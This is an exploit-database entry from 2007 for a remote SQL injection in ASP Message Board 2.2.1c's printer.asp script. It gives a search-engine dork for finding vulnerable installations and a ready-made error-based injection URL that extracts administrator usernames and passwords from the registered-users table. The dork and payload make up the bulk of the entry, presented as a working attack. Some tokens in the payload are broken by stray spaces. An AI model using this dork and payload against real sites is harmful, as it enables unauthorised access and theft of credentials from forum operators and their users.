id: 2274
date: 11/05/2007
title: ASP Message Board 2.2.1c Remote SQL Injection Vulnerability
author: Q7x
cves: 

===========================================================
ASP Message Board 2.2.1c Remote SQL Injection Vulnerability
===========================================================



* Bug Found On : "ASP Message Board"
*
* Found By : Q7x
*  ( Ashiyane2 Security Team )
*
* Dork : inurl:"printer.asp?forum="
*
* Version : 2.2.1c
*
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit
*
* Exploit : Admin User / Password : http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))




#  0day.today [2023-03-27]  #